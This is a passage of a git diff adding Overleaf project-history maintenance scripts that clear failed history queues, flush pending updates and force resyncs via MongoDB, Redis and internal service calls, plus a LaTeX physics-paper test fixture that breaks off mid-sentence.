from the failure records +async function main() { + const results = await db.projectHistoryFailures + .find({ error: /history store a non-success status code: 422/ }) + .toArray() + + console.log('number of queues without history store 442 =', results.length) + // now check if the project is truly deleted in mongo + async.eachSeries(results.slice(0, limit), checkAndClear, err => { + console.log('Final error status', err) + console.log( + 'Project not found errors', + projectNotFoundErrors, + projectsNotFound + ) + console.log( + 'Project with history id errors', + projectWithHistoryIdErrors, + projectsWithHistoryId + ) + console.log( + 'Project imported from V1 errors', + projectImportedFromV1Errors, + projectsImportedFromV1 + ) + process.exit() + }) +} + +main().catch(error => { + console.error(error) + process.exit(1) +}) diff --git a/services/project-history/scripts/clear_filestore_404.js b/services/project-history/scripts/clear_filestore_404.js new file mode 100755 index 0000000..3c9ca98 --- /dev/null +++ b/services/project-history/scripts/clear_filestore_404.js @@ -0,0 +1,204 @@ +#!/usr/bin/env node + +// To run in dev: +// +// docker compose run --rm project-history scripts/clear_deleted.js +// +// In production: +// +// docker run --rm $(docker ps -lq) scripts/clear_deleted.js + +import async from 'async' +import logger from '@overleaf/logger' +import request from 'request' +import Settings from '@overleaf/settings' +import redis from '@overleaf/redis-wrapper' +import { db, ObjectId } from '../app/js/mongodb.js' + +logger.logger.level('fatal') + +const rclient = redis.createClient(Settings.redis.project_history) +const Keys = Settings.redis.project_history.key_schema + +const argv = process.argv.slice(2) +const limit = parseInt(argv[0], 10) || null +const force = argv[1] === 'force' || false +let projectNotFoundErrors = 0 +let projectImportedFromV1Errors = 0 +const projectsNotFound = [] +const projectsImportedFromV1 = [] + +function checkAndClear(project, callback) { + const projectId = project.project_id + console.log('checking project', projectId) + + // These can probably also be reset and their overleaf.history.id unset + // (unless they are v1 projects). + + function checkNotV1Project(cb) { + db.projects.findOne( + { _id: new ObjectId(projectId) }, + { projection: { overleaf: true } }, + (err, result) => { + console.log( + '1. looking in mongo projects collection: err', + err, + 'result', + JSON.stringify(result) + ) + if (err) { + return cb(err) + } + if (!result) { + return cb(new Error('project not found in mongo')) + } + if (result && result.overleaf && !result.overleaf.id) { + console.log(' - project is not imported from v1 - ok to clear') + cb() + } else { + cb(new Error('project is imported from v1 - will not clear it')) + } + } + ) + } + + function clearProjectHistoryInMongo(cb) { + if (force) { + console.log('2. deleting overleaf.history.id in mongo project', projectId) + // Accessing mongo projects collection directly - BE CAREFUL! + db.projects.updateOne( + { _id: new ObjectId(projectId) }, + { $unset: { 'overleaf.history.id': '' } }, + (err, result) => { + console.log(' - got result from remove', err, result) + if (err) { + return err + } + if ( + result && + (result.modifiedCount === 1 || result.modifiedCount === 0) + ) { + return cb() + } else { + return cb( + new Error('error: problem trying to unset overleaf.history.id') + ) + } + } + ) + } else { + console.log( + '2. would delete overleaf.history.id for', + projectId, + 'from mongo' + ) + cb() + } + } + + function clearDocUpdaterCache(cb) { + const url = Settings.apis.documentupdater.url + '/project/' + projectId + if (force) { + console.log('3. making request to clear docupdater', url) + request.delete(url, (err, response, body) => { + console.log( + ' - result of request', + err, + response && response.statusCode, + body + ) + cb(err) + }) + } else { + console.log('3. dry run, would request DELETE on url', url) + cb() + } + } + + function clearRedisQueue(cb) { + const key = Keys.projectHistoryOps({ project_id: projectId }) + if (force) { + console.log('4. deleting redis queue key', key) + rclient.del(key, err => { + cb(err) + }) + } else { + console.log('4. dry run, would delete redis key', key) + cb() + } + } + + function clearMongoEntry(cb) { + if (force) { + console.log('5. deleting key in mongo projectHistoryFailures', projectId) + db.projectHistoryFailures.deleteOne( + { project_id: projectId }, + (err, result) => { + console.log(' - got result from remove', err, result) + cb(err) + } + ) + } else { + console.log('5. would delete failure record for', projectId, 'from mongo') + cb() + } + } + + // do the checks and deletions + async.waterfall( + [ + checkNotV1Project, + clearProjectHistoryInMongo, + clearDocUpdaterCache, + clearRedisQueue, + clearMongoEntry, + ], + err => { + if (!err) { + return setTimeout(callback, 1000) // include a 1 second delay + } else if (err.message === 'project not found in mongo') { + projectNotFoundErrors++ + projectsNotFound.push(projectId) + return callback() + } else if ( + err.message === 'project is imported from v1 - will not clear it' + ) { + projectImportedFromV1Errors++ + projectsImportedFromV1.push(projectId) + return callback() + } else { + console.log('error:', err) + return callback(err) + } + } + ) +} + +// find all the broken projects from the failure records +async function main() { + const results = await db.projectHistoryFailures + .find({ error: 'Error: bad response from filestore: 404' }) + .toArray() + + console.log('number of queues without filestore 404 =', results.length) + // now check if the project is truly deleted in mongo + async.eachSeries(results.slice(0, limit), checkAndClear, err => { + console.log('Final error status', err) + console.log( + 'Project not found errors', + projectNotFoundErrors, + projectsNotFound + ) + console.log( + 'Project imported from V1 errors', + projectImportedFromV1Errors, + projectsImportedFromV1 + ) + process.exit() + }) +} + +main().catch(error => { + console.error(error) + process.exit(1) +}) diff --git a/services/project-history/scripts/clear_project_version_out_of_order.js b/services/project-history/scripts/clear_project_version_out_of_order.js new file mode 100755 index 0000000..54883a8 --- /dev/null +++ b/services/project-history/scripts/clear_project_version_out_of_order.js @@ -0,0 +1,260 @@ +#!/usr/bin/env node + +// To run in dev: +// +// docker compose run --rm project-history scripts/clear_deleted.js +// +// In production: +// +// docker run --rm $(docker ps -lq) scripts/clear_deleted.js + +import async from 'async' +import logger from '@overleaf/logger' +import request from 'request' +import Settings from '@overleaf/settings' +import redis from '@overleaf/redis-wrapper' +import { db, ObjectId } from '../app/js/mongodb.js' + +logger.logger.level('fatal') + +const rclient = redis.createClient(Settings.redis.project_history) +const Keys = Settings.redis.project_history.key_schema + +const argv = process.argv.slice(2) +const limit = parseInt(argv[0], 10) || null +const force = argv[1] === 'force' || false +let projectNotFoundErrors = 0 +let projectImportedFromV1Errors = 0 +const projectsNotFound = [] +const projectsImportedFromV1 = [] +let projectHasV2HistoryErrors = 0 +const projectsV2HistoryInUse = [] + +function checkAndClear(project, callback) { + const projectId = project.project_id + console.log('checking project', projectId) + + // These can probably also be reset and their overleaf.history.id unset + // (unless they are v1 projects). + + function checkNotV1Project(cb) { + db.projects.findOne( + { _id: new ObjectId(projectId) }, + { projection: { overleaf: true } }, + (err, result) => { + console.log( + '1. looking in mongo projects collection: err', + err, + 'result', + JSON.stringify(result) + ) + if (err) { + return cb(err) + } + if (!result) { + return cb(new Error('project not found in mongo')) + } + + const isV1Project = result && result.overleaf && result.overleaf.id + const hasHistoryId = + result && + result.overleaf && + result.overleaf.history && + result.overleaf.history.id + const hasV2HistoryInUse = + result && + result.overleaf && + result.overleaf.history && + result.overleaf.history.display + const hasExistingDeletedHistory = + result && + result.overleaf.history && + result.overleaf.history.deleted_id + if ( + hasHistoryId && + !(isV1Project || hasV2HistoryInUse || hasExistingDeletedHistory) + ) { + console.log( + ' - project is not imported from v1 and v2 history is not in use - ok to clear' + ) + return cb() + } else if (hasHistoryId && hasExistingDeletedHistory) { + console.log(' - project already has deleted_id') + return cb( + new Error('project already has deleted_id - will not clear it') + ) + } else if (hasHistoryId && isV1Project) { + console.log(' - project is imported from v1') + return cb( + new Error('project is imported from v1 - will not clear it') + ) + } else if (hasHistoryId && hasV2HistoryInUse) { + console.log(' - project is displaying v2 history') + return cb( + new Error('project is displaying v2 history - will not clear it') + ) + } else { + console.log(' - project state not recognised') + return cb(new Error('project state not recognised')) + } + } + ) + } + + function clearProjectHistoryInMongo(cb) { + if (force) { + console.log('2. deleting overleaf.history.id in mongo project', projectId) + // Accessing mongo projects collection directly - BE CAREFUL! + db.projects.updateOne( + { _id: new ObjectId(projectId) }, + { $rename: { 'overleaf.history.id': 'overleaf.history.deleted_id' } }, + (err, result) => { + console.log(' - got result from remove', err, result) + if (err) { + return err + } + if ( + result && + (result.modifiedCount === 1 || result.modifiedCount === 0) + ) { + return cb() + } else { + return cb( + new Error('error: problem trying to unset overleaf.history.id') + ) + } + } + ) + } else { + console.log( + '2. would delete overleaf.history.id for', + projectId, + 'from mongo' + ) + cb() + } + } + + function clearDocUpdaterCache(cb) { + const url = Settings.apis.documentupdater.url + '/project/' + projectId + if (force) { + console.log('3. making request to clear docupdater', url) + request.delete(url, (err, response, body) => { + console.log( + ' - result of request', + err, + response && response.statusCode, + body + ) + cb(err) + }) + } else { + console.log('3. dry run, would request DELETE on url', url) + cb() + } + } + + function clearRedisQueue(cb) { + const key = Keys.projectHistoryOps({ project_id: projectId }) + if (force) { + console.log('4. deleting redis queue key', key) + rclient.del(key, err => { + cb(err) + }) + } else { + console.log('4. dry run, would delete redis key', key) + cb() + } + } + + function clearMongoEntry(cb) { + if (force) { + console.log('5. deleting key in mongo projectHistoryFailures', projectId) + db.projectHistoryFailures.deleteOne( + { project_id: projectId }, + (err, result) => { + console.log(' - got result from remove', err, result) + cb(err) + } + ) + } else { + console.log('5. would delete failure record for', projectId, 'from mongo') + cb() + } + } + + // do the checks and deletions + async.waterfall( + [ + checkNotV1Project, + clearProjectHistoryInMongo, + clearDocUpdaterCache, + clearRedisQueue, + clearMongoEntry, + ], + err => { + if (!err) { + return setTimeout(callback, 100) // include a delay + } else if (err.message === 'project not found in mongo') { + projectNotFoundErrors++ + projectsNotFound.push(projectId) + return callback() + } else if ( + err.message === 'project is imported from v1 - will not clear it' + ) { + projectImportedFromV1Errors++ + projectsImportedFromV1.push(projectId) + return callback() + } else if ( + err.message === 'project is displaying v2 history - will not clear it' + ) { + projectHasV2HistoryErrors++ + projectsV2HistoryInUse.push(projectId) + return callback() + } else { + console.log('error:', err) + return callback(err) + } + } + ) +} + +// find all the broken projects from the failure records +async function main() { + const results = await db.projectHistoryFailures + .find({ + error: + 'OpsOutOfOrderError: project structure version out of order on incoming updates', + }) + .toArray() + + console.log( + 'number of queues with project structure version out of order on incoming updates=', + results.length + ) + // now clear the projects + async.eachSeries(results.slice(0, limit), checkAndClear, err => { + console.log('Final error status', err) + console.log( + 'Project not found errors', + projectNotFoundErrors, + projectsNotFound + ) + console.log( + 'Project imported from V1 errors', + projectImportedFromV1Errors, + projectsImportedFromV1 + ) + console.log( + 'Project has V2 history in use', + projectHasV2HistoryErrors, + projectsV2HistoryInUse + ) + process.exit() + }) +} + +main().catch(error => { + console.error(error) + process.exit(1) +}) diff --git a/services/project-history/scripts/debug_translate_updates.js b/services/project-history/scripts/debug_translate_updates.js new file mode 100755 index 0000000..bb89637 --- /dev/null +++ b/services/project-history/scripts/debug_translate_updates.js @@ -0,0 +1,74 @@ +#!/usr/bin/env node + +/** + * This script takes a dump file, obtained via the /project/:project_id/dump + * endpoint and feeds it to the update translator to how updates are transfomed + * into changes sent to v1 history. + */ +import fs from 'node:fs' +import * as UpdateTranslator from '../app/js/UpdateTranslator.js' +import * as SyncManager from '../app/js/SyncManager.js' +import * as HistoryStoreManager from '../app/js/HistoryStoreManager.js' + +const { filename } = parseArgs() +const { projectId, updates, chunk } = parseDumpFile(filename) + +function expandResyncProjectStructure(chunk, update) { + HistoryStoreManager._mocks.getMostRecentChunk = function ( + projectId, + projectHistoryId, + callback + ) { + callback(null, chunk) + } + + SyncManager.expandSyncUpdates( + projectId, + 99999, // dummy history id + chunk, + [update], + cb => cb(), // extend lock + (err, result) => { + console.log('err', err, 'result', JSON.stringify(result, null, 2)) + process.exit() + } + ) +} + +function expandUpdates(updates) { + const wrappedUpdates = updates.map(update => ({ update })) + let changes + try { + changes = UpdateTranslator.convertToChanges(projectId, wrappedUpdates) + } catch (err) { + error(err) + } + console.log(JSON.stringify(changes, null, 2)) +} + +if (updates[0].resyncProjectStructure) { + expandResyncProjectStructure(chunk, updates[0]) +} else { + expandUpdates(updates) +} + +function parseArgs() { + const args = process.argv.slice(2) + if (args.length !== 1) { + console.log('Usage: debug_translate_updates.js DUMP_FILE') + process.exit(1) + } + const filename = args[0] + return { filename } +} + +function parseDumpFile(filename) { + const json = fs.readFileSync(filename) + const { project_id: projectId, updates, chunk } = JSON.parse(json) + return { projectId, updates, chunk } +} + +function error(err) { + console.error(err) + process.exit(1) +} diff --git a/services/project-history/scripts/flush_all.js b/services/project-history/scripts/flush_all.js new file mode 100755 index 0000000..83f8fbd --- /dev/null +++ b/services/project-history/scripts/flush_all.js @@ -0,0 +1,93 @@ +#!/usr/bin/env node + +// To run in dev: +// +// docker compose run --rm project-history scripts/flush_all.js <limit> +// +// In production: +// +// docker run --rm $(docker ps -lq) scripts/flush_all.js <limit> + +import _ from 'lodash' +import async from 'async' +import logger from '@overleaf/logger' +import * as RedisManager from '../app/js/RedisManager.js' +import * as UpdatesProcessor from '../app/js/UpdatesProcessor.js' + +logger.logger.level('fatal') + +const argv = process.argv.slice(2) +const limit = parseInt(argv[0], 10) || null +const parallelism = Math.min(parseInt(argv[1], 10) || 1, 10) + +// flush all outstanding changes +RedisManager.getProjectIdsWithHistoryOps(limit, flushProjects) + +function flushProjects(error, projectIds) { + if (error) { + throw error + } + let ts = new Date() + console.log( + 'found projects', + JSON.stringify({ project_ids: projectIds.length, limit, ts }) + ) + projectIds = _.shuffle(projectIds) // randomise to avoid hitting same projects each time + if (limit > 0) { + projectIds = projectIds.slice(0, limit) + } + + let succeededProjects = 0 + let failedProjects = 0 + let attempts = 0 + + async.eachLimit( + projectIds, + parallelism, + function (projectId, cb) { + attempts++ + UpdatesProcessor.processUpdatesForProject( + projectId, + function (err, queueSize) { + const progress = attempts + '/' + projectIds.length + ts = new Date() + if (err) { + failedProjects++ + console.log( + 'failed', + progress, + JSON.stringify({ + projectId, + queueSize, + ts, + err: err.toString(), + }) + ) + } else { + succeededProjects++ + console.log( + 'succeeded', + progress, + JSON.stringify({ + projectId, + queueSize, + ts, + }) + ) + } + return cb() + } + ) + }, + function () { + console.log( + 'total', + JSON.stringify({ + succeededProjects, + failedProjects, + }) + ) + process.exit(0) + } + ) +} diff --git a/services/project-history/scripts/flush_old.js b/services/project-history/scripts/flush_old.js new file mode 100644 index 0000000..6dc1401 --- /dev/null +++ b/services/project-history/scripts/flush_old.js @@ -0,0 +1,191 @@ +#!/usr/bin/env node + +import Settings from '@overleaf/settings' +import minimist from 'minimist' +import logger from '@overleaf/logger' +import PQueue from 'p-queue' +import * as RedisManager from '../app/js/RedisManager.js' +import * as ErrorRecorder from '../app/js/ErrorRecorder.js' + +logger.logger.level('fatal') + +function usage() { + console.log(` +Usage: flush_old.js [options] + +Options: + -b, --batch-size <size> Number of projects to process in each batch (default: 100) + -a, --max-age <seconds> Maximum age of projects to keep (default: 3600) + -i, --interval <seconds> Interval to spread the processing over (default: 300) + -c, --concurrency <number> Number of concurrent jobs (default: 10) + -u, --buffer <seconds> Buffer time in seconds to reserve at end (default: 15) + -n, --dry-run Show what would be done without making changes + -h, --help Show this help message + +Examples: + # Flush projects older than 24 hours with 5 concurrent jobs + flush_old.js --batch-size 100 --max-age 86400 -c 5 + + # Dry run to see what would be flushed + flush_old.js --max-age 3600 --dry-run +`) + process.exit(0) +} + +const argv = minimist(process.argv.slice(2), { + boolean: ['dry-run', 'help'], + alias: { + b: 'batch-size', + a: 'max-age', + i: 'interval', + c: 'concurrency', + n: 'dry-run', + u: 'buffer', + h: 'help', + }, + default: { + 'batch-size': 100, + 'max-age': 3600, + interval: 300, + concurrency: 10, + 'dry-run': false, + buffer: 15, + help: false, + }, +}) + +if (argv.help || process.argv.length === 2) { + usage() +} + +const batchSize = parseInt(argv['batch-size'], 10) +const maxAge = argv['max-age'] ? parseInt(argv['max-age'], 10) : null +const interval = parseInt(argv.interval, 10) || 300 +const concurrency = parseInt(argv.concurrency, 10) || 10 +const bufferTime = parseInt(argv.buffer, 10) || 15 +const dryRun = argv['dry-run'] + +/** + * Generator function that yields batches of items from an array + * @param {Array} array - The array to batch + * @param {number} size - The size of each batch + * @yields {Array} A batch of items + */ +function* getBatches(array, size) { + for (let i = 0; i < array.length; i += size) { + yield array.slice(i, i + size) + } +} + +let flushCount = 0 + +async function flushProject({ projectId, timestamp }) { + const url = `${Settings.apis.project_history.url}/project/${projectId}/flush` + if (dryRun) { + console.log(`[DRY RUN] would flush project ${projectId}`) + return + } + const response = await fetch(url, { + method: 'POST', + }) + flushCount++ + if (flushCount % 100 === 0) { + console.log('flushed', flushCount, 'projects, up to', timestamp) + } + if (!response.ok) { + throw new Error(`failed to flush project ${projectId}`) + } +} + +const SCRIPT_START_TIME = Date.now() // current time in milliseconds from start of script + +function olderThan(maxAge, timestamp) { + const age = (SCRIPT_START_TIME - timestamp) / 1000 + return age > maxAge +} + +async function main() { + const projectIds = await RedisManager.promises.getProjectIdsWithHistoryOps() + const failedProjects = await ErrorRecorder.promises.getFailedProjects() + const failedProjectIds = new Set(failedProjects.map(p => p.project_id)) + + const projectIdsToProcess = projectIds.filter(p => !failedProjectIds.has(p)) + console.log('number of projects with history ops', projectIds.length) + console.log( + 'number of failed projects to exclude', + projectIds.length - projectIdsToProcess.length + ) + const collectedProjects = [] + let nullCount = 0 + // iterate over the project ids in batches of doing a redis MGET to retrieve the first op timestamps + for (const batch of getBatches(projectIdsToProcess, batchSize)) { + const timestamps = await RedisManager.promises.getFirstOpTimestamps(batch) + const newProjects = batch + .map((projectId, idx) => { + return { projectId, timestamp: timestamps[idx] } + }) + .filter(({ timestamp }) => { + if (!timestamp) { + nullCount++ + } + return timestamp ? olderThan(maxAge, timestamp) : true + }) + collectedProjects.push(...newProjects) + } + // sort the collected projects by ascending timestamp + collectedProjects.sort((a, b) => a.timestamp - b.timestamp) + + console.log('number of projects to flush', collectedProjects.length) + console.log('number with null timestamps', nullCount) + + const elapsedTime = Math.floor((Date.now() - SCRIPT_START_TIME) / 1000) + console.log('elapsed time', elapsedTime, 'seconds, buffer time', bufferTime) + const remainingTime = Math.max(interval - elapsedTime - bufferTime, 0) + console.log('remaining time', remainingTime, 'seconds') + + const jobsPerSecond = Math.max( + Math.ceil(collectedProjects.length / Math.max(remainingTime, 60)), + 1 + ) + console.log('interval', interval, 'seconds') + console.log('jobs per second', jobsPerSecond) + console.log('concurrency', concurrency) + + const queue = new PQueue({ + concurrency, + interval: 1000, + intervalCap: jobsPerSecond, + }) + + const taskFns = collectedProjects.map(project => { + return async () => { + try { + await flushProject(project) + return { status: 'fulfilled', value: project } + } catch (error) { + return { status: 'rejected', reason: error, project } + } + } + }) + + const results = await queue.addAll(taskFns) + + console.log( + 'finished after', + Math.floor((Date.now() - SCRIPT_START_TIME) / 1000), + 'seconds' + ) + // count the number of successful and failed flushes + const success = results.filter(r => r.status === 'fulfilled').length + const failed = results.filter(r => r.status === 'rejected').length + console.log('completed', { success, failed }) +} + +main() + .then(() => { + process.exit(0) + }) + .catch(err => { + console.error(err) + process.exit(1) + }) diff --git a/services/project-history/scripts/force_resync.js b/services/project-history/scripts/force_resync.js new file mode 100755 index 0000000..13e7d3c --- /dev/null +++ b/services/project-history/scripts/force_resync.js @@ -0,0 +1,233 @@ +#!/usr/bin/env node + +// To run in dev: +// +// docker compose run --rm project-history scripts/clear_deleted.js +// +// In production: +// +// docker run --rm $(docker ps -lq) scripts/clear_deleted.js + +import async from 'async' +import Settings from '@overleaf/settings' +import redis from '@overleaf/redis-wrapper' +import { db, ObjectId } from '../app/js/mongodb.js' +import * as SyncManager from '../app/js/SyncManager.js' +import * as UpdatesProcessor from '../app/js/UpdatesProcessor.js' + +const rclient = redis.createClient(Settings.redis.project_history) +const Keys = Settings.redis.project_history.key_schema + +const argv = process.argv.slice(2) +const limit = parseInt(argv[0], 10) || null +const force = argv[1] === 'force' || false +let projectNotFoundErrors = 0 +let projectImportedFromV1Errors = 0 +const projectsNotFound = [] +const projectsImportedFromV1 = [] +let projectNoHistoryIdErrors = 0 +let projectsFailedErrors = 0 +const projectsFailed = [] +let projectsBrokenSyncErrors = 0 +const projectsBrokenSync = [] + +function checkAndClear(project, callback) { + const projectId = project.project_id + console.log('checking project', projectId) + + // These can probably also be reset and their overleaf.history.id unset + // (unless they are v1 projects). + + function checkNotV1Project(cb) { + db.projects.findOne( + { _id: new ObjectId(projectId) }, + { projection: { overleaf: true } }, + (err, result) => { + console.log( + '1. looking in mongo projects collection: err', + err, + 'result', + JSON.stringify(result) + ) + if (err) { + return cb(err) + } + if (!result) { + return cb(new Error('project not found in mongo')) + } + if (result && result.overleaf && !result.overleaf.id) { + if (result.overleaf.history.id) { + console.log( + ' - project is not imported from v1 and has a history id - ok to resync' + ) + return cb() + } else { + console.log( + ' - project is not imported from v1 but does not have a history id' + ) + return cb(new Error('no history id')) + } + } else { + cb(new Error('project is imported from v1 - will not resync it')) + } + } + ) + } + + function startResync(cb) { + if (force) { + console.log('2. starting resync for', projectId) + SyncManager.startHardResync(projectId, err => { + if (err) { + console.log('ERR', JSON.stringify(err.message)) + return cb(err) + } + setTimeout(cb, 3000) // include a delay to allow the request to be processed + }) + } else { + console.log('2. dry run, would start resync for', projectId) + cb() + } + } + + function forceFlush(cb) { + if (force) { + console.log('3. forcing a flush for', projectId) + UpdatesProcessor.processUpdatesForProject(projectId, err => { + console.log('err', err) + return cb(err) + }) + } else { + console.log('3. dry run, would force a flush for', projectId) + cb() + } + } + + function watchRedisQueue(cb) { + const key = Keys.projectHistoryOps({ project_id: projectId }) + function checkQueueEmpty(_callback) { + rclient.llen(key, (err, result) => { + console.log('LLEN', projectId, err, result) + if (err) { + _callback(err) + } + if (result === 0) { + _callback() + } else { + _callback(new Error('queue not empty')) + } + }) + } + if (force) { + console.log('4. checking redis queue key', key) + async.retry({ times: 30, interval: 1000 }, checkQueueEmpty, err => { + cb(err) + }) + } else { + console.log('4. dry run, would check redis key', key) + cb() + } + } + + function checkMongoFailureEntry(cb) { + if (force) { + console.log('5. checking key in mongo projectHistoryFailures', projectId) + db.projectHistoryFailures.findOne( + { project_id: projectId }, + { projection: { _id: 1 } }, + (err, result) => { + console.log('got result', err, result) + if (err) { + return cb(err) + } + if (result) { + return cb(new Error('failure record still exists')) + } + return cb() + } + ) + } else { + console.log('5. would check failure record for', projectId, 'in mongo') + cb() + } + } + + // do the checks and deletions + async.waterfall( + [ + checkNotV1Project, + startResync, + forceFlush, + watchRedisQueue, + checkMongoFailureEntry, + ], + err => { + if (!err) { + return setTimeout(callback, 1000) // include a 1 second delay + } else if (err.message === 'project not found in mongo') { + projectNotFoundErrors++ + projectsNotFound.push(projectId) + return callback() + } else if (err.message === 'no history id') { + projectNoHistoryIdErrors++ + return callback() + } else if ( + err.message === 'project is imported from v1 - will not resync it' + ) { + projectImportedFromV1Errors++ + projectsImportedFromV1.push(projectId) + return callback() + } else if ( + err.message === 'history store a non-success status code: 422' + ) { + projectsFailedErrors++ + projectsFailed.push(projectId) + return callback() + } else if (err.message === 'sync ongoing') { + projectsBrokenSyncErrors++ + projectsBrokenSync.push(projectId) + return callback() + } else { + console.log('error:', err) + return callback() + } + } + ) +} + +async function main() { + const results = await db.projectHistoryFailures.find().toArray() + + console.log('number of queues without history store 442 =', results.length) + // now check if the project is truly deleted in mongo + async.eachSeries(results.slice(0, limit), checkAndClear, err => { + console.log('Final error status', err) + console.log( + 'Project flush failed again errors', + projectsFailedErrors, + projectsFailed + ) + console.log( + 'Project flush ongoing errors', + projectsBrokenSyncErrors, + projectsBrokenSync + ) + console.log( + 'Project not found errors', + projectNotFoundErrors, + projectsNotFound + ) + console.log('Project without history_id errors', projectNoHistoryIdErrors) + console.log( + 'Project imported from V1 errors', + projectImportedFromV1Errors, + projectsImportedFromV1 + ) + process.exit() + }) +} + +main().catch(error => { + console.error(error) + process.exit(1) +}) diff --git a/services/project-history/test/acceptance/fixtures/blobs/35c9bd86574d61dcadbce2fdd3d4a0684272c6ea b/services/project-history/test/acceptance/fixtures/blobs/35c9bd86574d61dcadbce2fdd3d4a0684272c6ea new file mode 100644 index 0000000..35c9bd8 --- /dev/null +++ b/services/project-history/test/acceptance/fixtures/blobs/35c9bd86574d61dcadbce2fdd3d4a0684272c6ea @@ -0,0 +1,404 @@ +% Choose pra, prb, prc, prd, pre, prl, prstab, or rmp for journal +% Add 'draft' option to mark overfull boxes with black boxes +% Add 'showpacs' option to make PACS codes appear +% for review and submission +%\documentclass[aps,preprint,showpacs,superscriptaddress,groupedaddress]{revtex4} % for double-spaced preprint +% needed for figures +% needed for some tables +% for math +% for math +% for crossing out text +% for coloring text +%\input{tcilatex} + + +\documentclass[aps,prl,twocolumn,showpacs,superscriptaddress,groupedaddress]{revtex4} + +\usepackage{graphicx} +\usepackage{dcolumn} +\usepackage{bm} +\usepackage{amssymb} +\usepackage{soul} +\usepackage{color} + +%TCIDATA{OutputFilter=LATEX.DLL} +%TCIDATA{Version=5.50.0.2960} +%TCIDATA{<META NAME="SaveForMode" CONTENT="1">} +%TCIDATA{BibliographyScheme=BibTeX} +%TCIDATA{LastRevised=Tuesday, May 20, 2014 03:06:00} +%TCIDATA{<META NAME="GraphicsSave" CONTENT="32">} + +\hyphenation{ALPGEN} +\hyphenation{EVTGEN} +\hyphenation{PYTHIA} +\def\be{\begin{equation}} +\def\ee{\end{equation}} +\def\bea{\begin{eqnarray}} +\def\eea{\end{eqnarray}} +%\input{tcilatex} + +\begin{document} + +\title{Transport measurements of the spin wave gap of Mn} +\input author_list.tex +\date{\today} + +\begin{abstract} +Temperature dependent transport measurements on ultrathin antiferromagnetic +Mn films reveal a heretofore unknown non-universal weak localization +correction to the conductivity which extends to disorder strengths greater than +100~k$\Omega$ per square. The inelastic scattering of electrons off of +gapped antiferromagnetic spin waves gives rise to an inelastic scattering +length which is short enough to place the system in the 3D regime. The +extracted fitting parameters provide estimates of the energy gap ($\Delta +\approx$~16~K) and exchange energy ($\bar{J} \approx$~320~K). %\st{which are in +%agreement with values obtained with other techniques}. +\end{abstract} + +\pacs{75} + +\maketitle + +Hello world + + + +Thin-film transition metal ferromagnets (Fe, Co, Ni, Gd) and +antiferromagnets (Mn, Cr) and their alloys are not only ubiquitous in +present day technologies but are also expected to play an important role in +future developments~\cite{thompson_2008}. Understanding magnetism in these +materials, especially when the films are thin enough so that disorder plays +an important role, is complicated by the long standing controversy about the +relative importance of itinerant and local moments~\cite% +{slater_1936,van_vleck_1953,aharoni_2000}. For the itinerant transition +metal magnets, a related fundamental issue centers on the question of how +itinerancy is compromised by disorder. Clearly with sufficient disorder the +charge carriers become localized, but questions arise as to what happens to +the spins and associated spin waves and whether the outcome depends on the +ferro/antiferro alignment of spins in the itinerant parent. Ferromagnets +which have magnetization as the order parameter are fundamentally different +than antiferromagnets which have staggered magnetization (i.e., difference +between the magnetization on each sublattice) as the order parameter~\cite% +{blundell_2001}. Ferromagnetism thus distinguishes itself by having soft +modes at zero wave number whereas antiferromagnets have soft modes at finite +wave number~\cite{belitz_2005}. Accordingly, the respective spin wave +spectrums are radically different. These distinctions are particularly +important when comparing quantum corrections to the conductivity near +quantum critical points for ferromagnets~\cite{paul_2005} and +antiferromagnets~\cite{syzranov_2012}. + +Surprisingly, although there have been systematic studies of the effect of +disorder on the longitudinal $\sigma_{xx}$ and transverse $\sigma_{xy}$ +conductivity of ferromagnetic films~\cite% +{bergmann_1978,bergmann_1991,mitra_2007,misra_2009,kurzweil_2009}, there +have been few if any such studies on antiferromagnetic films. In this paper +we remedy this situation by presenting transport data on systematically +disordered Mn films that are sputter deposited in a custom designed vacuum +chamber and then transferred without exposure to air into an adjacent +cryostat for transport studies to low temperature. The experimental +procedures are similar to those reported previously: disorder, characterized +by the sheet resistance $R_0$ measured at $T=$~5~K, can be changed either by +growing separate samples or by gentle annealing of a given sample through +incremental stages of disorder~\cite{misra_2011}. Using these same procedures our results for +antiferromagnets however are decidedly different. The data are well +described over a large range of disorder strengths by a non-universal three +dimensional (3d) quantum correction that applies only to spin wave gapped +antiferromagnets. This finding implies the presence of strong inelastic +electron scattering off of antiferromagnetic spin waves. The theory is +validated not only by good fits to the data but also by extraction from the +fitting parameters of a value for the spin wave gap $\Delta$ that is in +agreement with the value expected for Mn. On the other hand, the +exchange energy $\bar{J}$ could be sensitive to the high disorder in our +ultra thin films, and it turns out to be much smaller compared to the known values. + +In previous work the inelastic scattering of electrons off of spin waves has +been an essential ingredient in understanding disordered ferromagnets. For +example, to explain the occurrence of weak-localization corrections to the +anomalous Hall effect in polycrystalline Fe films~\cite{mitra_2007}, it was +necessary to invoke a contribution to the inelastic phase breaking rate $% +\tau_{\varphi}^{-1}$ due to spin-conserving inelastic scattering off +spin-wave excitations. This phase breaking rate, anticipated by theory~\cite% +{tatara_2004} and seen experimentally in spin polarized electron energy loss +spectroscopy (SPEELS) measurements of ultrathin Fe films~\cite% +{plihal_1999,zhang_2010}, is linear in temperature and significantly larger +than the phase breaking rate due to electron-electron interactions, thus +allowing a wide temperature range to observe weak localization corrections~% +\cite{mitra_2007}. The effect of a high $\tau_{\varphi}^{-1}$ due to +inelastic scattering off spin-wave excitations is also seen in Gd films +where in addition to a localizing log($T$) quantum correction to the +conductance, a localizing linear-in-$T$ quantum correction is present and is +interpreted as a spin-wave mediated Altshuler-Aronov type correction to the +conductivity~\cite{misra_2009}. + +Interestingly, this high rate of inelastic spin rate scattering becomes even +more important for the thinnest films as shown in theoretical calculations +on Fe and Ni which point to extremely short spin-dependent inelastic mean +free paths~\cite{hong_2000} and in spin-polarized electron energy-loss +spectroscopy (SPEELS) measurements on few monolayer-thick Fe/W(110) films in +which a strong nonmonotonic enhancement of localized spin wave energies is +found on the thinnest films~\cite{zhang_2010}. + +Inelastic spin wave scattering in highly disordered ferromagnetic films can +be strong enough to assure that the associated $T$-dependent dephasing +length $L_{\varphi }(T)=\sqrt{D\tau _{\varphi }}$ (with $D$ the diffusion +constant)~\cite{lee_1985} is less than the film thickness $t$, thus putting +thin films into the 3d limit where a metal-insulator +transition is observed~\cite{misra_2011}. Recognizing that similarly high +inelastic scattering rates must apply to highly disordered antiferromagnetic +films, we first proceed with a theoretical approach that takes into account +the scattering of antiferromagnetic spin waves on the phase relaxation rate +and find a heretofore unrecognized non-universal 3d weak localization +correction to the conductivity that allows an interpretation of our experimental +results. + +We mention in passing that the 3d 